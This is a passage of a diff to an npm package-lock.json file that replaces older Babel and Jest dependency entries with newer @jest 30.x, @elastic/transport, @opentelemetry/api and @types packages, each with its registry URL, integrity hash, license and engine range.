"dev": true, + "node_modules/@elastic/transport": { + "version": "8.9.6", + "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", + "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", + "license": "Apache-2.0", "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" + "@opentelemetry/api": "1.x", + "debug": "^4.4.0", + "hpagent": "^1.2.0", + "ms": "^2.1.3", + "secure-json-parse": "^3.0.1", + "tslib": "^2.8.1", + "undici": "^6.21.1" }, "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true, + "license": "MIT", "engines": { - "node": ">=0.8.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", "dev": true, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" + "@types/node": "*", + "jest-regex-util": "30.0.1" }, "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.9.tgz", - "integrity": "sha512-5UamI7xkUcJ3i9qVDS+KFDEK8/7oJ55/sJMB1Ge7IEapr7KfdfV/HErR+koZwOfd+SgtFKOKRhRakdg++DcJpQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/core": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.9.tgz", - "integrity": "sha512-G2EgeufBcYw27U4hhoIwFcgc1XU7TlXJ3mv04oOv1WCuo900U/anZSPzEqNjwdjgffkk2Gs0AN0dW1CKVLcG7w==", + "node_modules/@jest/pattern/node_modules/jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.9", - "@babel/helper-compilation-targets": "^7.22.9", - "@babel/helper-module-transforms": "^7.22.9", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.1" - }, + "license": "MIT", "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/core/node_modules/convert-source-map": { + "node_modules/@opentelemetry/api": { "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, + "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.0.tgz", + "integrity": "sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==", + "license": "Apache-2.0", "engines": { - "node": ">=6.9.0" + "node": ">=8.0.0" } }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.9.tgz", - "integrity": "sha512-7qYrNM6HjpnPHJbopxmb8hSPoZ0gsX8IvUS32JGVoy+pU9e5N0nLr1VjJoR6kA4d9dmGLxNYOjeB8sUDal2WMw==", - "dev": true, + "node_modules/@swc/helpers": { + "version": "0.5.17", + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.17.tgz", + "integrity": "sha512-5IKx/Y13RsYd+sauPb2x+U/xZikHjolzfuDgTAl/Tdf3Q8rslRvC19NKDLgAJQ6wsqADk10ntlv08nPFw/gO/A==", + "license": "Apache-2.0", "dependencies": { - "@babel/compat-data": "^7.22.9", - "@babel/helper-validator-option": "^7.22.5", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "tslib": "^2.8.0" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@types/command-line-args": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/@types/command-line-args/-/command-line-args-5.2.3.tgz", + "integrity": "sha512-uv0aG6R0Y8WHZLTamZwtfsDLVRnOa+n+n5rEvFWL5Na5gZ8V2Teab/duDPFzIIIhs9qizDpcavCusCLJZu62Kw==", + "license": "MIT" + }, + "node_modules/@types/command-line-usage": { + "version": "5.0.4", + "resolved": "https://registry.npmjs.org/@types/command-line-usage/-/command-line-usage-5.0.4.tgz", + "integrity": "sha512-BwR5KP3Es/CSht0xqBcUXS3qCAUVXwpRKsV2+arxeb65atasuXG9LykC9Ab10Cw3s2raH92ZqOeILaQbsB2ACg==", + "license": "MIT" + }, + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", "dev": true, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "@types/istanbul-lib-report": "*" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", + "node_modules/@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.9.tgz", - "integrity": "sha512-t+WA2Xn5K+rTeGtC8jCsdAH52bjggG5TKRuRrAGNM/mjIbO4GxvlLMFOEz9wXY5I2XQ60PMFsAG2WIcG82dQMQ==", + "node_modules/@types/jest/node_modules/@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "@jest/get-type": "30.0.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", + "node_modules/@types/jest/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@sinclair/typebox": "^0.34.0" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + "node_modules/@types/jest/node_modules/@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@types/jest/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@types/jest/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", + "node_modules/@types/jest/node_modules/ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=8" } }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", + "node_modules/@types/jest/node_modules/expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@types/jest/node_modules/jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@types/jest/node_modules/jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", "dev": true, + "license": "MIT", "dependencies": { - "color-convert": "^1.9.0" + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@types/jest/node_modules/jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", "dev": true, + "license": "MIT", "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@types/jest/node_modules/jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", "dev": true, + "license": "MIT", "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@types/jest/node_modules/jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", + "node_modules/@types/jest/node_modules/picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, + "license": "MIT", "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "node": ">=12" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "node_modules/@types/jest/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, + "node_modules/@types/node": { + "version": "20.17.46", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", + "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "undici-types": "~6.19.2" } }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - 